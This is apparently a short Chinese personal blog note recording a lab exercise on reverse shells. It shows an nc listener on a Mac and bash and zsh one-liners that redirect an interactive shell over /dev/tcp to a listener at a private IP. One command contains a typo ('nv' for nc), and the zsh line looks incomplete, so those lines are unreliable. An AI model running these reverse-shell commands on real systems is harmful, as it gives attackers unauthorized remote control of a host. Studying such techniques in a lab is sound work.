反弹shell整理

发表于2023-04-23|更新于2023-04-23|CVE

|阅读量:

1.本机mac通过nc启动监听

1 2	sudo su nv -lv 6767

2.在靶机上输入shell脚本命令,反弹shell:mac->(攻击kali)

1 2	#linux执行脚本 bash -i >& /dev/tcp/192.168.2.15(mac ip)/6767 0>&1

如下图,成功截取linux系统操作

3.监控到mac目标靶机上执行的脚本

1
2
3

#mac环境执行脚本
sudo su
zsh -i > /dev/tcp/192.168.2.15/6767

如下图所示:

参考博客:

https://juejin.cn/post/7089273867243356174 –命令参考博客

https://zhuanlan.zhihu.com/p/138393396 –反弹shell原理理解

文章作者: 小天

文章链接: http://example.com/2023/04/23/%E5%8F%8D%E5%BC%B9shell%E6%95%B4%E7%90%86/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自小天的博客！

相关推荐

Linux指令语法

fastjson漏洞-20220523

log4j2的jndi注入问题 mac本机电脑复现

spring-framework漏洞

评论